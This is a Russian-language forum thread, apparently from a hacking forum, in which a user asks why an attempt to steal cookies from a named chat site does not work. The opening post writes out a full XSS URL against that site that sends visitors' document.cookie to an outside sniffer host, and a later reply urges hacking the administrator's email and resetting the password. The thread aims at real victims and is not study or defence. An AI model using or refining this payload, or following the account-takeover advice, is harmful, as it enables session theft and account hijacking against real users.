|
Что я делаю не так?
Здравствуйте, я хочу украсть куки с чата (http://home.onego.ru/~smokie_chat/chat/), разобрался я вроде бы с XSS, со снифферами, нашёл на сайт ачата какой XSS используется в voodoo (?url=javascript:alert(/Tested%20by%20qBiN/);)
Сниффер использую http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif В итоге получилось у меня вот такая вещь http://home.onego.ru/~smokie_chat/chat/?url=javascript:document.location="http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif"+document.cookie; Но куки всё равно в логах не выдаёт(((( Что же я делаю не так?! И может ли это быть связано с тем, что сервер находится на провайдере onego.ru? Или может я ошибку допускаю? :confused: |
Ну помогите пожалуйста, кто чем может.....
|
А чё ето за чат-то?? ) Лучше бы подумал как chat.karelia.info паламадь!
|
Помогите кто чем может....(((
|
Ты где там xss то вообще нашёл ? ;) =)
|
http://home.onego.ru/~smokie_chat/chat/go.php?url=javascript:alert()
Д-к вот он...алерт выскакивает, как и должно быть в XSS...или я не прав? |
лол. ну-ну
|
у тебя наврят ли что-нить получится с xss.
ломай мыло админа и восстановливай пароль. |
Ок, но обьясните чё не так-то? Ведь в это статье написано мол в вудувских чатах это XSS http://forum.antichat.ru/thread20985.html
|
Проги найди и инфу про взломы почитай(Фак),мож с хss че и получиться....
|
| Время: 14:49 |